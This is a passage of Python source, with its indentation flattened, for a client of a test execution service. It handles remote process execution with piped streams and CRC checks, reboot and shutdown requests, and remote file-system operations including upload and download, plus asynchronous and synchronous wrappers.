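# async* sibling, so (with a hypothetical oSession) these are equivalent:
#
#   fIsFile = oSession.syncIsFile('/remote/file');
#
#   if oSession.asyncIsFile('/remote/file') is not False:
#       oSession.waitForTask(oSession.cMsTimeout + 5000);
#       fIsFile = oSession.getResult();
#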
#
# Connection tasks.
#
def taskConnect(self, cMsIdleFudge):
"""Tries to connect to the TXS"""
while not self.isCancelled():
reporter.log2('taskConnect: connecting ...');
rc = self.oTransport.connect(self.getMsLeft(500));
if rc is True:
reporter.log('taskConnect: succeeded');
return self.taskGreet(cMsIdleFudge);
if rc is None:
reporter.log2('taskConnect: unable to connect');
return None;
if self.hasTimedOut():
reporter.log2('taskConnect: timed out');
if not self.fTryConnect:
reporter.maybeErr(self.fErr, 'taskConnect: timed out');
return False;
time.sleep(self.getMsLeft(1, 1000) / 1000.0);
if not self.fTryConnect:
reporter.maybeErr(self.fErr, 'taskConnect: cancelled');
return False;
def taskGreet(self, cMsIdleFudge):
"""Greets the TXS"""
rc = self.sendMsg("HOWDY", ());
if rc is True:
rc = self.recvAckLogged("HOWDY", self.fTryConnect);
if rc is True:
while cMsIdleFudge > 0:
cMsIdleFudge -= 1000;
time.sleep(1);
else:
self.oTransport.disconnect(self.fTryConnect);
return rc;
def taskBye(self):
"""Says goodbye to the TXS"""
rc = self.sendMsg("BYE");
if rc is True:
rc = self.recvAckLogged("BYE");
self.oTransport.disconnect();
return rc;
def taskUuid(self):
"""Gets the TXS UUID"""
rc = self.sendMsg("UUID");
if rc is True:
rc = False;
cbMsg, sOpcode, abPayload = self.recvReply();
if cbMsg is not None:
sOpcode = sOpcode.strip();
if sOpcode == "ACK UUID":
sUuid = getSZ(abPayload, 0);
if sUuid is not None:
sUuid = '{%s}' % (sUuid,)
try:
_ = uuid.UUID(sUuid);
rc = sUuid;
except:
reporter.errorXcpt('taskUuid got an invalid UUID string %s' % (sUuid,));
else:
reporter.maybeErr(self.fErr, 'taskUuid did not get a UUID string.');
else:
reporter.maybeErr(self.fErr, 'taskUuid got a bad reply: %s' % (sOpcode,));
else:
reporter.maybeErr(self.fErr, 'taskUuid got 3xNone from recvReply.');
return rc;
#
# Process task
# pylint: disable=C0111
#
def taskExecEx(self, sExecName, fFlags, asArgs, asAddEnv, oStdIn, oStdOut, oStdErr, oTestPipe, sAsUser): # pylint: disable=R0913,R0914,R0915,C0301
# Construct the payload.
aoPayload = [long(fFlags), '%s' % (sExecName), long(len(asArgs))];
for sArg in asArgs:
aoPayload.append('%s' % (sArg));
aoPayload.append(long(len(asAddEnv)));
for sPutEnv in asAddEnv:
aoPayload.append('%s' % (sPutEnv));
for o in (oStdIn, oStdOut, oStdErr, oTestPipe):
if utils.isString(o):
aoPayload.append(o);
elif o is not None:
aoPayload.append('|');
o.uTxsClientCrc32 = zlib.crc32(b'');
else:
aoPayload.append('');
aoPayload.append('%s' % (sAsUser));
aoPayload.append(long(self.cMsTimeout));
# Kick of the EXEC command.
rc = self.sendMsg('EXEC', aoPayload);
if rc is True:
rc = self.recvAckLogged('EXEC');
if rc is True:
# Loop till the process completes, feed input to the TXS and
# receive output from it.
sFailure = "";
msPendingInputReply = None;
cbMsg, sOpcode, abPayload = (None, None, None);
while True:
# Pending input?
if msPendingInputReply is None \
and oStdIn is not None \
and not utils.isString(oStdIn):
try:
sInput = oStdIn.read(65536);
except:
reporter.errorXcpt('read standard in');
sFailure = 'exception reading stdin';
rc = None;
break;
if sInput:
oStdIn.uTxsClientCrc32 = zlib.crc32(sInput, oStdIn.uTxsClientCrc32);
# Convert to a byte array before handing it off to sendMsg or the string
# will get some zero termination added breaking the CRC (and injecting
# unwanted bytes).
abInput = array.array('B', sInput);
rc = self.sendMsg('STDIN', (long(oStdIn.uTxsClientCrc32 & 0xffffffff), abInput));
if rc is not True:
sFailure = 'sendMsg failure';
break;
msPendingInputReply = base.timestampMilli();
continue;
rc = self.sendMsg('STDINEOS');
oStdIn = None;
if rc is not True:
sFailure = 'sendMsg failure';
break;
msPendingInputReply = base.timestampMilli();
# Wait for input (500 ms timeout).
if cbMsg is None:
cbMsg, sOpcode, abPayload = self.recvReply(cMsTimeout=500, fNoDataOk=True);
if cbMsg is None:
# Check for time out before restarting the loop.
# Note! Only doing timeout checking here does mean that
# the TXS may prevent us from timing out by
# flooding us with data. This is unlikely though.
if self.hasTimedOut() \
and ( msPendingInputReply is None \
or base.timestampMilli() - msPendingInputReply > 30000):
reporter.maybeErr(self.fErr, 'taskExecEx: timed out');
sFailure = 'timeout';
rc = None;
break;
# Check that the connection is OK.
if not self.oTransport.isConnectionOk():
self.oTransport.disconnect();
sFailure = 'disconnected';
rc = False;
break;
continue;
# Handle the response.
sOpcode = sOpcode.rstrip();
if sOpcode == 'STDOUT':
oOut = oStdOut;
elif sOpcode == 'STDERR':
oOut = oStdErr;
elif sOpcode == 'TESTPIPE':
oOut = oTestPipe;
else:
oOut = None;
if oOut is not None:
# Output from the process.
if len(abPayload) < 4:
sFailure = 'malformed output packet (%s, %u bytes)' % (sOpcode, cbMsg);
reporter.maybeErr(self.fErr, 'taskExecEx: %s' % (sFailure));
rc = None;
break;
uStreamCrc32 = getU32(abPayload, 0);
oOut.uTxsClientCrc32 = zlib.crc32(abPayload[4:], oOut.uTxsClientCrc32);
if uStreamCrc32 != (oOut.uTxsClientCrc32 & 0xffffffff):
sFailure = 'crc error - mine=%#x their=%#x (%s, %u bytes)' \
% (oOut.uTxsClientCrc32 & 0xffffffff, uStreamCrc32, sOpcode, cbMsg);
reporter.maybeErr(self.fErr, 'taskExecEx: %s' % (sFailure));
rc = None;
break;
try:
oOut.write(abPayload[4:]);
except:
sFailure = 'exception writing %s' % (sOpcode);
reporter.errorXcpt('taskExecEx: %s' % (sFailure));
rc = None;
break;
elif sOpcode == 'STDINIGN' and msPendingInputReply is not None:
# Standard input is ignored. Ignore this condition for now.
msPendingInputReply = None;
reporter.log('taskExecEx: Standard input is ignored... why?');
del oStdIn.uTxsClientCrc32;
oStdIn = '/dev/null';
elif (sOpcode == 'STDINMEM' or sOpcode == 'STDINBAD' or sOpcode == 'STDINCRC')\
and msPendingInputReply is not None:
# TXS STDIN error, abort.
# TODO: STDINMEM - consider undoing the previous stdin read and trying to resubmit it.
msPendingInputReply = None;
sFailure = 'TXS is out of memory for std input buffering';
reporter.maybeErr(self.fErr, 'taskExecEx: %s' % (sFailure));
rc = None;
break;
elif sOpcode == 'ACK' and msPendingInputReply is not None:
msPendingInputReply = None;
elif sOpcode.startswith('PROC '):
# Process status message, handle it outside the loop.
rc = True;
break;
else:
sFailure = 'Unexpected opcode %s' % (sOpcode);
reporter.maybeErr(self.fErr, 'taskExecEx: %s' % (sFailure));
rc = None;
break;
# Clear the message.
cbMsg, sOpcode, abPayload = (None, None, None);
# If we sent an STDIN packet and didn't get a reply yet, we'll give
# TXS some 5 seconds to reply to this. If we don't wait here we'll
# get screwed later on if we mix it up with the reply to some other
# command. Hackish.
if msPendingInputReply is not None:
cbMsg2, sOpcode2, abPayload2 = self.oTransport.recvMsg(5000);
if cbMsg2 is not None:
reporter.log('taskExecEx: Out of order STDIN, got reply: %s, %s, %s [ignored]'
% (cbMsg2, sOpcode2, abPayload2));
msPendingInputReply = None;
else:
reporter.maybeErr(self.fErr, 'taskExecEx: Pending STDIN, no reply after 5 secs!');
self.fScrewedUpMsgState = True;
# Parse the exit status (True), abort (None) or do nothing (False).
if rc is True:
if sOpcode != 'PROC OK':
# Do proper parsing some other day if needed:
# PROC TOK, PROC TOA, PROC DWN, PROC DOO,
# PROC NOK + rc, PROC SIG + sig, PROC ABD, FAILED.
rc = False;
else:
if rc is None:
# Abort it.
reporter.log('taskExecEx: sending ABORT...');
rc = self.sendMsg('ABORT');
while rc is True:
cbMsg, sOpcode, abPayload = self.oTransport.recvMsg(30000);
if cbMsg is None:
reporter.maybeErr(self.fErr, 'taskExecEx: Pending ABORT, no reply after 30 secs!')
self.fScrewedUpMsgState = True;
break;
if sOpcode.startswith('PROC '):
reporter.log('taskExecEx: ABORT reply: %s, %s, %s [ignored]' % (cbMsg, sOpcode, abPayload));
break;
reporter.log('taskExecEx: ABORT in process, ignoring reply: %s, %s, %s' % (cbMsg, sOpcode, abPayload));
# Check that the connection is OK before looping.
if not self.oTransport.isConnectionOk():
self.oTransport.disconnect();
break;
# Fake response with the reason why we quit.
if sFailure is not None:
self.t3oReply = (0, 'EXECFAIL', sFailure);
rc = None;
else:
rc = None;
# Cleanup.
for o in (oStdIn, oStdOut, oStdErr, oTestPipe):
if o is not None and not utils.isString(o):
del o.uTxsClientCrc32; # pylint: disable=E1103
# Make sure all files are closed
o.close(); # pylint: disable=E1103
reporter.log('taskExecEx: returns %s' % (rc));
return rc;
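#
# Rough shape of the EXEC exchange implemented above, summarised from the
# handlers in taskExecEx (not from a protocol spec):
#
#   client                              TXS
#   EXEC <flags,name,args,env,...> -->
#                                  <--  ACK
#   STDIN <crc32,data> / STDINEOS  -->  (only while stdin is piped)
#                                  <--  ACK / STDINIGN / STDINMEM/BAD/CRC
#                                  <--  STDOUT/STDERR/TESTPIPE <crc32,data>
#                                  <--  PROC OK / PROC NOK / PROC SIG / ...
#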
#
# Admin tasks
#
def hlpRebootShutdownWaitForAck(self, sCmd):
"""Wait for reboot/shutodwn ACK."""
rc = self.recvAckLogged(sCmd);
if rc is True:
# poll a little while for server to disconnect.
uMsStart = base.timestampMilli();
while self.oTransport.isConnectionOk() \
and base.timestampMilli() - uMsStart < 5000:
if self.oTransport.isRecvPending(min(500, self.getMsLeft())):
break;
self.oTransport.disconnect();
return rc;
def taskReboot(self):
rc = self.sendMsg('REBOOT');
if rc is True:
rc = self.hlpRebootShutdownWaitForAck('REBOOT');
return rc;
def taskShutdown(self):
rc = self.sendMsg('SHUTDOWN');
if rc is True:
rc = self.hlpRebootShutdownWaitForAck('SHUTDOWN');
return rc;
#
# CD/DVD control tasks.
#
## TODO
#
# File system tasks
#
def taskMkDir(self, sRemoteDir, fMode):
rc = self.sendMsg('MKDIR', (fMode, sRemoteDir));
if rc is True:
rc = self.recvAckLogged('MKDIR');
return rc;
def taskMkDirPath(self, sRemoteDir, fMode):
rc = self.sendMsg('MKDRPATH', (fMode, sRemoteDir));
if rc is True:
rc = self.recvAckLogged('MKDRPATH');
return rc;
def taskMkSymlink(self, sLinkTarget, sLink):
rc = self.sendMsg('MKSYMLNK', (sLinkTarget, sLink));
if rc is True:
rc = self.recvAckLogged('MKSYMLNK');
return rc;
def taskRmDir(self, sRemoteDir):
rc = self.sendMsg('RMDIR', (sRemoteDir,));
if rc is True:
rc = self.recvAckLogged('RMDIR');
return rc;
def taskRmFile(self, sRemoteFile):
rc = self.sendMsg('RMFILE', (sRemoteFile,));
if rc is True:
rc = self.recvAckLogged('RMFILE');
return rc;
def taskRmSymlink(self, sRemoteSymlink):
rc = self.sendMsg('RMSYMLNK', (sRemoteSymlink,));
if rc is True:
rc = self.recvAckLogged('RMSYMLNK');
return rc;
def taskRmTree(self, sRemoteTree):
rc = self.sendMsg('RMTREE', (sRemoteTree,));
if rc is True:
rc = self.recvAckLogged('RMTREE');
return rc;
#def "CHMOD "
#def "CHOWN "
#def "CHGRP "
def taskIsDir(self, sRemoteDir):
rc = self.sendMsg('ISDIR', (sRemoteDir,));
if rc is True:
rc = self.recvTrueFalse('ISDIR');
return rc;
def taskIsFile(self, sRemoteFile):
rc = self.sendMsg('ISFILE', (sRemoteFile,));
if rc is True:
rc = self.recvTrueFalse('ISFILE');
return rc;
def taskIsSymlink(self, sRemoteSymlink):
rc = self.sendMsg('ISSYMLNK', (sRemoteSymlink,));
if rc is True:
rc = self.recvTrueFalse('ISSYMLNK');
return rc;
#def "STAT "
#def "LSTAT "
#def "LIST "
def taskUploadFile(self, sLocalFile, sRemoteFile):
#
# Open the local file (make sure it exists before bothering TXS) and
# tell TXS that we want to upload a file.
#
try:
oLocalFile = utils.openNoInherit(sLocalFile, 'rb');
except:
reporter.errorXcpt('taskUpload: failed to open "%s"' % (sLocalFile));
return False;
# Common code shared with taskUploadString.
rc = self.taskUploadCommon(oLocalFile, sRemoteFile);
# Cleanup.
oLocalFile.close();
return rc;
def taskUploadString(self, sContent, sRemoteFile):
# Wrap sContent in a file like class.
class InStringFile(object): # pylint: disable=R0903
def __init__(self, sContent):
self.sContent = sContent;
self.off = 0;
def read(self, cbMax):
cbLeft = len(self.sContent) - self.off;
if cbLeft == 0:
return "";
if cbLeft <= cbMax:
sRet = self.sContent[self.off:(self.off + cbLeft)];
else:
sRet = self.sContent[self.off:(self.off + cbMax)];
self.off = self.off + len(sRet);
return sRet;
oLocalString = InStringFile(sContent);
return self.taskUploadCommon(oLocalString, sRemoteFile);
def taskUploadCommon(self, oLocalFile, sRemoteFile):
"""Common worker used by taskUploadFile and taskUploadString."""
# Command + ACK.
rc = self.sendMsg('PUT FILE', (sRemoteFile,));
if rc is True:
rc = self.recvAckLogged('PUT FILE');
if rc is True:
#
# Push data packets until eof.
#
uMyCrc32 = zlib.crc32(b'');
while True:
# Read up to 64 KB of data.
try:
sRaw = oLocalFile.read(65536);
except:
rc = None;
break;
# Convert to array - this is silly!
abBuf = array.array('B');
if utils.isString(sRaw):
for i, _ in enumerate(sRaw):
abBuf.append(ord(sRaw[i]));
else:
abBuf.extend(sRaw);
sRaw = None;
# Update the file stream CRC and send it off.
uMyCrc32 = zlib.crc32(abBuf, uMyCrc32);
if not abBuf:
rc = self.sendMsg('DATA EOF', (long(uMyCrc32 & 0xffffffff), ));
else:
rc = self.sendMsg('DATA ', (long(uMyCrc32 & 0xffffffff), abBuf));
if rc is False:
break;
# Wait for the reply.
rc = self.recvAck();
if rc is not True:
if rc is False:
reporter.maybeErr(self.fErr, 'taskUpload: transport error waiting for ACK');
else:
reporter.maybeErr(self.fErr, 'taskUpload: DATA response was %s: %s' % (rc[0], rc[1]));
rc = False;
break;
# EOF?
if not abBuf:
break;
# Send ABORT on ACK and I/O errors.
if rc is None:
rc = self.sendMsg('ABORT');
if rc is True:
self.recvAckLogged('ABORT');
rc = False;
return rc;
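#
# The upload exchange above, summarised from the code (not a spec): send
# 'PUT FILE' with the remote name, then repeated 'DATA ' packets, each
# carrying the running CRC-32 of the whole stream followed by up to 64 KB
# of file data and each individually ACKed, terminated by a 'DATA EOF'
# packet that carries only the final CRC.
#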
def taskDownloadFile(self, sRemoteFile, sLocalFile):
try:
oLocalFile = utils.openNoInherit(sLocalFile, 'wb');
except:
reporter.errorXcpt('taskDownload: failed to open "%s"' % (sLocalFile));
return False;
rc = self.taskDownloadCommon(sRemoteFile, oLocalFile);
oLocalFile.close();
if rc is False:
try:
os.remove(sLocalFile);
except:
reporter.errorXcpt();
return rc;
def taskDownloadString(self, sRemoteFile, sEncoding = 'utf-8', fIgnoreEncodingErrors = True):
# Wrap sContent in a file like class.
class OutStringFile(object): # pylint: disable=R0903
def __init__(self):
self.asContent = [];
def write(self, sBuf):
self.asContent.append(sBuf);
return None;
oLocalString = OutStringFile();
rc = self.taskDownloadCommon(sRemoteFile, oLocalString);
if rc is True:
rc = '';
for sBuf in oLocalString.asContent:
if hasattr(sBuf, 'decode'):
rc += sBuf.decode(sEncoding, 'ignore' if fIgnoreEncodingErrors else 'strict');
else:
rc += sBuf;
return rc;
def taskDownloadCommon(self, sRemoteFile, oLocalFile):
"""Common worker for taskDownloadFile and taskDownloadString."""
rc = self.sendMsg('GET FILE', (sRemoteFile,));
if rc is True:
#
# Process data packets until eof.
#
uMyCrc32 = zlib.crc32(b'');
while rc is True:
cbMsg, sOpcode, abPayload = self.recvReply();
if cbMsg is None:
reporter.maybeErr(self.fErr, 'taskDownload got 3xNone from recvReply.');
rc = None;
break;
# Validate.
sOpcode = sOpcode.rstrip();
if sOpcode != 'DATA' and sOpcode != 'DATA EOF':
reporter.maybeErr(self.fErr, 'taskDownload got an error reply: opcode="%s" details="%s"'
% (sOpcode, getSZ(abPayload, 0, "None")));
rc = False;
break;
if sOpcode == 'DATA' and len(abPayload) < 4:
reporter.maybeErr(self.fErr, 'taskDownload got a bad DATA packet: len=%u' % (len(abPayload)));
rc = None;
break;
if sOpcode == 'DATA EOF' and len(abPayload) != 4:
reporter.maybeErr(self.fErr, 'taskDownload got a bad EOF packet: len=%u' % (len(abPayload)));
rc = None;
break;
# Check the CRC (common for both packets).
uCrc32 = getU32(abPayload, 0);
if sOpcode == 'DATA':
uMyCrc32 = zlib.crc32(abPayload[4:], uMyCrc32);
if uCrc32 != (uMyCrc32 & 0xffffffff):
reporter.maybeErr(self.fErr, 'taskDownload got a bad CRC: mycrc=%s remotecrc=%s'
% (hex(uMyCrc32), hex(uCrc32)));
rc = None;
break;
if sOpcode == 'DATA EOF':
rc = self.sendMsg('ACK');
break;
# Finally, push the data to the file.
try:
oLocalFile.write(abPayload[4:].tostring());
except:
reporter.errorXcpt('I/O error writing to "%s"' % (sRemoteFile));
rc = None;
break;
rc = self.sendMsg('ACK');
# Send NACK on validation and I/O errors.
if rc is None:
rc = self.sendMsg('NACK');
rc = False;
return rc;
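#
# The download exchange mirrors the upload one (again summarised from the
# code above): send 'GET FILE' with the remote name, then the TXS streams
# 'DATA' packets (u32 running CRC-32 + chunk), each of which the client
# ACKs, finishing with a 'DATA EOF' packet whose payload is just the final
# CRC.  A 'NACK' goes back on CRC mismatches and local I/O errors.
#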
def taskUnpackFile(self, sRemoteFile, sRemoteDir):
rc = self.sendMsg('UNPKFILE', (sRemoteFile, sRemoteDir));
if rc is True:
rc = self.recvAckLogged('UNPKFILE');
return rc;
# pylint: enable=C0111
#
# Public methods - generic task queries
#
def isSuccess(self):
"""Returns True if the task completed successfully, otherwise False."""
self.lockTask();
sStatus = self.sStatus;
oTaskRc = self.oTaskRc;
self.unlockTask();
if sStatus != "":
return False;
if oTaskRc is False or oTaskRc is None:
return False;
return True;
def getResult(self):
"""
Returns the result of a completed task.
Returns None if not completed yet or no previous task.
"""
self.lockTask();
sStatus = self.sStatus;
oTaskRc = self.oTaskRc;
self.unlockTask();
if sStatus != "":
return None;
return oTaskRc;
def getLastReply(self):
"""
Returns the last reply three-tuple: cbMsg, sOpcode, abPayload.
Returns a None, None, None three-tuple if there was no last reply.
"""
self.lockTask();
t3oReply = self.t3oReply;
self.unlockTask();
return t3oReply;
#
# Public methods - connection.
#
def asyncDisconnect(self, cMsTimeout = 30000, fIgnoreErrors = False):
"""
Initiates a disconnect task.
Returns True on success, False on failure (logged).
The task returns True on success and False on failure.
"""
return self.startTask(cMsTimeout, fIgnoreErrors, "bye", self.taskBye);
def syncDisconnect(self, cMsTimeout = 30000, fIgnoreErrors = False):
"""Synchronous version."""
return self.asyncToSync(self.asyncDisconnect, cMsTimeout, fIgnoreErrors);
def asyncUuid(self, cMsTimeout = 30000, fIgnoreErrors = False):
"""
Initiates a task for getting the TXS UUID.
Returns True on success, False on failure (logged).
The task returns the UUID string (in {}) on success and False on failure.
"""
return self.startTask(cMsTimeout, fIgnoreErrors, "uuid", self.taskUuid);
def syncUuid(self, cMsTimeout = 30000, fIgnoreErrors = False):
"""Synchronous version."""
return self.asyncToSync(self.asyncUuid, cMsTimeout, fIgnoreErrors);
#
# Public methods - execution.
#
def asyncExecEx(self, sExecName, asArgs = (), asAddEnv = (), # pylint: disable=R0913
oStdIn = None, oStdOut = None, oStdErr = None, oTestPipe = None,
sAsUser = "", cMsTimeout = 3600000, fIgnoreErrors = False):
"""
Initiates an exec process task.
Returns True on success, False on failure (logged).
The task returns True if the process exited normally with status code 0.
The task returns None on failure prior to executing the process, and
False if the process exited with a different status or in an abnormal
manner. Both None and False are logged, and further info can
also be obtained by getLastReply().
The oStdIn, oStdOut, oStdErr and oTestPipe parameters specify how to
deal with these streams. If None, no special action is taken and the
output goes to wherever the TXS sends its output, and ditto for input.
- To send to / read from the bitbucket, pass '/dev/null'.
- To redirect to/from a file, just specify the remote filename.
- To append to a file use '>>' followed by the remote filename.
- To pipe the stream to/from the TXS, specify a file like
object. For StdIn a non-blocking read() method is required. For
the others a write() method is required. Watch out for deadlock
conditions between StdIn and StdOut/StdErr/TestPipe piping.
"""
return self.startTask(cMsTimeout, fIgnoreErrors, "exec", self.taskExecEx,
(sExecName, long(0), asArgs, asAddEnv, oStdIn,
oStdOut, oStdErr, oTestPipe, sAsUser));
def syncExecEx(self, sExecName, asArgs = (), asAddEnv = (), # pylint: disable=R0913
oStdIn = '/dev/null', oStdOut = '/dev/null',
oStdErr = '/dev/null', oTestPipe = '/dev/null',
sAsUser = '', cMsTimeout = 3600000, fIgnoreErrors = False):
"""Synchronous version."""
return self.asyncToSync(self.asyncExecEx, sExecName, asArgs, asAddEnv, oStdIn, oStdOut, \
oStdErr, oTestPipe, sAsUser, cMsTimeout, fIgnoreErrors);
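#
# Usage sketch (hypothetical sink class): capture a remote command's output
# by handing syncExecEx any object with write() and close() methods; the
# chunks arrive as byte arrays and taskExecEx closes the sink when done.
#
#   class OutBuf(object):
#       def __init__(self): self.abData = array.array('B');
#       def write(self, abBuf): self.abData.extend(abBuf);
#       def close(self): pass;
#   oStdOut = OutBuf();
#   fRc = oSession.syncExecEx('/bin/ls', asArgs = ('/bin/ls', '-l'), oStdOut = oStdOut);
#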
def asyncExec(self, sExecName, asArgs = (), asAddEnv = (), sAsUser = "", fWithTestPipe = True, sPrefix = '', \
cMsTimeout = 3600000, fIgnoreErrors = False):
"""
Initiates an exec process test task.
Returns True on success, False on failure (logged).
The task returns True if the process exited normally with status code 0.
The task returns None on failure prior to executing the process, and
False if the process exited with a different status or in an abnormal
manner. Both None and False are logged, and further info can
also be obtained by getLastReply().
Standard input is taken from /dev/null, while both standard output and
standard error go directly to reporter.log(). The test pipe is piped
to reporter.xxxx.
"""
sStdIn = '/dev/null';
oStdOut = reporter.FileWrapper('%sstdout' % sPrefix);
oStdErr = reporter.FileWrapper('%sstderr' % sPrefix);
if fWithTestPipe: oTestPipe = reporter.FileWrapperTestPipe();
else: oTestPipe = '/dev/null'; # pylint: disable=redefined-variable-type
return self.startTask(cMsTimeout, fIgnoreErrors, "exec", self.taskExecEx,
(sExecName, long(0), asArgs, asAddEnv, sStdIn, oStdOut, oStdErr, oTestPipe, sAsUser));
def syncExec(self, sExecName, asArgs = (), asAddEnv = (), sAsUser = '', fWithTestPipe = True, sPrefix = '',
cMsTimeout = 3600000, fIgnoreErrors = False):
"""Synchronous version."""
return self.asyncToSync(self.asyncExec, sExecName, asArgs, asAddEnv, sAsUser, fWithTestPipe, sPrefix, \
cMsTimeout, fIgnoreErrors);
#
# Public methods - system
#
def asyncReboot(self, cMsTimeout = 30000, fIgnoreErrors = False):
"""
Initiates a reboot task.
Returns True on success, False on failure (logged).
The task returns True on success, False on failure (logged). The
session will be disconnected on successful task completion.
"""
return self.startTask(cMsTimeout, fIgnoreErrors, "reboot", self.taskReboot, ());
def syncReboot(self, cMsTimeout = 30000, fIgnoreErrors = False):
"""Synchronous version."""
return self.asyncToSync(self.asyncReboot, cMsTimeout, fIgnoreErrors);
def asyncShutdown(self, cMsTimeout = 30000, fIgnoreErrors = False):
"""
Initiates a shutdown task.
Returns True on success, False on failure (logged).
The task returns True on success, False on failure (logged).
"""
return self.startTask(cMsTimeout, fIgnoreErrors, "shutdown", self.taskShutdown, ());
def syncShutdown(self, cMsTimeout = 30000, fIgnoreErrors = False):
"""Synchronous version."""
return self.asyncToSync(self.asyncShutdown, cMsTimeout, fIgnoreErrors);
#
# Public methods - file system
#
def asyncMkDir(self, sRemoteDir, fMode = 0o700, cMsTimeout = 30000, fIgnoreErrors = False):
"""
Initiates a mkdir task.
Returns True on success, False on failure (logged).
The task returns True on success, False on failure (logged).
"""
return self.startTask(cMsTimeout, fIgnoreErrors, "mkDir", self.taskMkDir, (sRemoteDir, long(fMode)));
def syncMkDir(self, sRemoteDir, fMode = 0o700, cMsTimeout = 30000, fIgnoreErrors = False):
"""Synchronous version."""
return self.asyncToSync(self.asyncMkDir, sRemoteDir, long(fMode), cMsTimeout, fIgnoreErrors);
def asyncMkDirPath(self, sRemoteDir, fMode = 0o700, cMsTimeout = 30000, fIgnoreErrors = False):
"""
Initiates a mkdir -p task.
Returns True on success, False on failure (logged).
The task returns True on success, False on failure (logged).
"""
return self.startTask(cMsTimeout, fIgnoreErrors, "mkDirPath", self.taskMkDirPath, (sRemoteDir, long(fMode)));
def syncMkDirPath(self, sRemoteDir, fMode = 0o700, cMsTimeout = 30000, fIgnoreErrors = False):
"""Synchronous version."""
return self.asyncToSync(self.asyncMkDirPath, sRemoteDir, long(fMode), cMsTimeout, fIgnoreErrors);
def asyncMkSymlink(self, sLinkTarget, sLink, cMsTimeout = 30000, fIgnoreErrors = False):
"""
Initiates a symlink task.
Returns True on success, False on failure (logged).
The task returns True on success, False on failure (logged).
"""
return self.startTask(cMsTimeout, fIgnoreErrors, "mkSymlink", self.taskMkSymlink, (sLinkTarget, sLink));
def syncMkSymlink(self, sLinkTarget, sLink, cMsTimeout = 30000, fIgnoreErrors = False):
"""Synchronous version."""
return self.asyncToSync(self.asyncMkSymlink, sLinkTarget, sLink, cMsTimeout, fIgnoreErrors);
def asyncRmDir(self, sRemoteDir, cMsTimeout = 30000, fIgnoreErrors = False):
"""
Initiates a rmdir task.
Returns True on success, False on failure (logged).
The task returns True on success, False on failure (logged).
"""
return self.startTask(cMsTimeout, fIgnoreErrors, "rmDir", self.taskRmDir, (sRemoteDir,));
def syncRmDir(self, sRemoteDir, cMsTimeout = 30000, fIgnoreErrors = False):
"""Synchronous version."""
return self.asyncToSync(self.asyncRmDir, sRemoteDir, cMsTimeout, fIgnoreErrors);
def asyncRmFile(self, sRemoteFile, cMsTimeout = 30000, fIgnoreErrors = False):
"""
Initiates a rmfile task.
Returns True on success, False on failure (logged).
The task returns True on success, False on failure (logged).
"""
return self.startTask(cMsTimeout, fIgnoreErrors, "rmFile", self.taskRmFile, (sRemoteFile,));
def syncRmFile(self, sRemoteFile, cMsTimeout = 30000, fIgnoreErrors = False):
"""Synchronous version."""
return self.asyncToSync(self.asyncRmFile, sRemoteFile, cMsTimeout, fIgnoreErrors);
def asyncRmSymlink(self, sRemoteSymlink, cMsTimeout = 30000, fIgnoreErrors = False):
"""
Initiates a rmsymlink task.
Returns True on success, False on failure (logged).
The task returns True on success, False on failure (logged).
"""
return self.startTask(cMsTimeout, fIgnoreErrors, "rmSymlink", self.taskRmSymlink, (sRemoteSymlink,));
def syncRmSymlink(self, sRemoteSymlink, cMsTimeout = 30000, fIgnoreErrors = False):
"""Synchronous version."""
return self.asyncToSync(self.asyncRmSymlink, sRemoteSymlink, cMsTimeout, fIgnoreErrors);
def asyncRmTree(self, sRemoteTree, cMsTimeout = 30000, fIgnoreErrors = False):
"""
Initiates a rmtree task.
Returns True on success, False on failure (logged).
The task returns True on success, False on failure (logged).
"""
return self.startTask(cMsTimeout, fIgnoreErrors, "rmTree", self.taskRmTree, (sRemoteTree,));
def syncRmTree(self, sRemoteTree, cMsTimeout = 30000, fIgnoreErrors = False):
"""Synchronous version."""
return self.asyncToSync(self.asyncRmTree, sRemoteTree, cMsTimeout, fIgnoreErrors);
#def "CHMOD "
#def "CHOWN "
#def "CHGRP "
def asyncIsDir(self, sRemoteDir, cMsTimeout = 30000, fIgnoreErrors = False):
"""
Initiates an is-dir query task.
Returns True on success, False on failure (logged).
The task returns True if it's a directory, False if it isn't, and
None on error (logged).
"""
return self.startTask(cMsTimeout, fIgnoreErrors, "isDir", self.taskIsDir, (sRemoteDir,));
def syncIsDir(self, sRemoteDir, cMsTimeout = 30000, fIgnoreErrors = False):
"""Synchronous version."""
return self.asyncToSync(self.asyncIsDir, sRemoteDir, cMsTimeout, fIgnoreErrors);
def asyncIsFile(self, sRemoteFile, cMsTimeout = 30000, fIgnoreErrors = False):
"""
Initiates an is-file query task.
Returns True on success, False on failure (logged).
The task returns True if it's a file, False if it isn't, and None on
error (logged).
"""
return self.startTask(cMsTimeout, fIgnoreErrors, "isFile", self.taskIsFile, (sRemoteFile,));
def syncIsFile(self, sRemoteFile, cMsTimeout = 30000, fIgnoreErrors = False):
"""Synchronous version."""
return self.asyncToSync(self.asyncIsFile, sRemoteFile, cMsTimeout, fIgnoreErrors);
def asyncIsSymlink(self, sRemoteSymlink, cMsTimeout = 30000, fIgnoreErrors = False):
"""
Initiates an is-symbolic-link query task.
Returns True on success, False on failure (logged).
The task returns True if it's a symbolic link, False if it isn't, and
None on error (logged).
"""
return self.startTask(cMsTimeout, fIgnoreErrors, "isSymlink", self.taskIsSymlink, (sRemoteSymlink,));
def syncIsSymlink(self, sRemoteSymlink, cMsTimeout = 30000, fIgnoreErrors = False):
"""Synchronous version."""
return self.asyncToSync(self.asyncIsSymlink, sRemoteSymlink, cMsTimeout, fIgnoreErrors);
#def "STAT "
#def "LSTAT "
#def "LIST "
def asyncUploadFile(self, sLocalFile, sRemoteFile, cMsTimeout = 30000, fIgnoreErrors = False):
"""
Initiates an upload file task.
Returns True on success, False on failure (logged).
The task returns True on success, False on failure (logged).
"""
return self.startTask(cMsTimeout, fIgnoreErrors, "upload", self.taskUploadFile, (sLocalFile, sRemoteFile));
def syncUploadFile(self, sLocalFile, sRemoteFile, cMsTimeout = 30000, fIgnoreErrors = False):
"""Synchronous version."""
return self.asyncToSync(self.asyncUploadFile, sLocalFile, sRemoteFile, cMsTimeout, fIgnoreErrors);
def asyncUploadString(self, sContent, sRemoteFile, cMsTimeout = 30000, fIgnoreErrors = False):
"""
Initiates an upload string task.
Returns True on success, False on failure (logged).
The task returns True on success, False on failure (logged).
"""
return self.startTask(cMsTimeout, fIgnoreErrors, "uploadString", self.taskUploadString, (sContent, sRemoteFile));
def syncUploadString(self, sContent, sRemoteFile, cMsTimeout = 30000, fIgnoreErrors = False):
"""Synchronous version."""
